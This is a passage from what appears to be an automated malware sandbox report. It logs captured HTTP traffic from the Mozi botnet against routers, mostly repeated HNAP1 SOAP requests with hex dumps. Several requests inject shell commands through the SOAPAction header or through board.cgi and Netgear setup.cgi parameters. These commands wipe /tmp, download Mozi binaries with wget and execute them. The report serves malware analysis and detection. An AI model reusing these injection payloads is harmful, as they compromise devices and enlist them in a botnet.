6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 173.222.98.151:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 149.47.68.142:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 134.84.133.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 114.158.233.160:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 155.230.225.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.78.24.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 92.122.164.134:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 171.247.8.159:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 